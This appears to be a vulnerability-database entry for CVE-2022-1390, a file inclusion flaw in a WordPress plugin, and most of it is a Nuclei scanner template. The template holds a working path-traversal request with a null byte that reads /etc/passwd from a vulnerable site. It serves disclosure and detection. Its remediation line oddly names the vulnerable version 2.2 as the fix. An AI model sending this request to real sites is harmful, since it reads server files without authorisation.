CVE-2022-1390: WordPress Admin Word Count Column 2.2 - Local File Inclusion

日期: 2025-08-01 | 影响软件: WordPress Admin Word Count Column 2.2 | POC: 已公开

漏洞描述

The plugin does not validate the path parameter given to readfile(), which could allow unauthenticated attackers to read arbitrary files on server running old version of PHP susceptible to the null byte technique. This could also lead to RCE by using a Phar Deserialization technique.

PoC代码[已公开]

id: CVE-2022-1390

info:
  name: WordPress Admin Word Count Column 2.2 - Local File Inclusion
  author: daffainfo,Splint3r7
  severity: critical
  description: |
    The plugin does not validate the path parameter given to readfile(), which could allow unauthenticated attackers to read arbitrary files on server running old version of PHP susceptible to the null byte technique. This could also lead to RCE by using a Phar Deserialization technique.
  impact: |
    An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to further compromise.
  remediation: |
    Update to the latest version of the WordPress Admin Word Count Column plugin (2.2 or higher) to fix the local file inclusion vulnerability.
  reference:
    - https://packetstormsecurity.com/files/166476/WordPress-Admin-Word-Count-Column-2.2-Local-File-Inclusion.html
    - https://wordpress.org/plugins/admin-word-count-column/
    - https://wpscan.com/vulnerability/6293b319-dc4f-4412-9d56-55744246c990
    - https://nvd.nist.gov/vuln/detail/CVE-2022-1390
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-1390
    cwe-id: CWE-22
    epss-score: 0.90612
    epss-percentile: 0.99595
    cpe: cpe:2.3:a:admin_word_count_column_project:admin_word_count_column:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: admin_word_count_column_project
    product: admin_word_count_column
    framework: wordpress
  tags: cve,cve2022,packetstorm,wpscan,wordpress,wp-plugin,lfi,wp,admin_word_count_column_project

http:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/admin-word-count-column/download-csv.php?path=../../../../../../../../../../../../etc/passwd\0'

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200
# digest: 4a0a004730450221008811859b7d6cfbb73c36e7ccad133c6015f5b03377b7c4aec2bb96509d49762702204f7e82f72737435c07c35a353d5f724354a5db40bc20d81ddadefa2b80393178:922c64590222798bb761d5b6d8e72950

相关漏洞推荐